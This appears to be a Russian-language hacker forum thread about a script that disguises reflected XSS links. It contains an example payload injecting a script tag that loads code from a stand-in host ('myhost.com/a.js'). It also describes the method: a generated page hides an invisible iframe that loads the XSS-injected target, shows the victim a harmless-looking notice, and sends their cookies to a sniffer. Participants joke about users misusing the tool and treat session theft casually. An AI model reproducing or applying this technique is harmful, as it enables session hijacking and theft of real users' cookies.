Типа http://loc.netsec.ru/ ?

=))

__________________
Фреймворк для спамера :(
Услуги программирования

типа да. Но где ты узрел 404 я не знаю...
Плюс ко всему я понял, что люди неисправимы... я посмотрел, чем забивают скрипт..туда пишут просто названия чатов, сайтов и т.п. типа скрипт сам должен искать уязвимости...Хоть бы инструкции читали...=(

Молоток, што скрипт закинул
гы, но ето ЛОЛ чистой воды
А для чего ты его используеш?
----------------------------------------------------------------
Претензий не имею, все ОК!

__________________

• Ukrainian Security Community – Блог спеціалістів з безпеки веб-додатків
• Security Audit

MoDL

в целях проверки

лол чистой воды?))
гыгыгыы

Антошка2003 +1

Ты прав, сейчас чистой воды небивает

__________________

• Ukrainian Security Community – Блог спеціалістів з безпеки веб-додатків
• Security Audit

MoDL

Он просто генерирует непалевную ссылку для пассивной ксс.. чтобы было типа dron-anarchy.blablabla.com/43950923485029384.html а не somechat.ru/chat.php?param=<script src='http://myhost.com/a.js'></script>

О... некрофилия процветает. Опять этот топик подняли со дна)))
по такому случаю надо пойти и залить более-менее нормальную версию на скачку

обновил. Опять просмотрел все сгенерированные файлы... никто не пользуется почти по назначению. все пишут название сайта и ждут пока скрипт найдет там XSS гыгы

кстати
Нет. Не так.
Т.к. скрипт работает без баз данных(думаю, понятно по какой причине) то все делается так:
скрипт создает страницу, содержащую невидимый фрейм, в который грузится страница с вставленным XSS-кодом. Тебе дается ссылка на страницу, при заходе на которую ты видишь грустную новость о том, что что-то там не активно. Если ты совсем параноик, то смотришь в исходный код и о чудо, благодаря модификации скрипта ничего вразумительного там не находишь. Со спокойной душой закрываешь страницу и идешь спать. А куки уже улетели через фрейм на сниффер.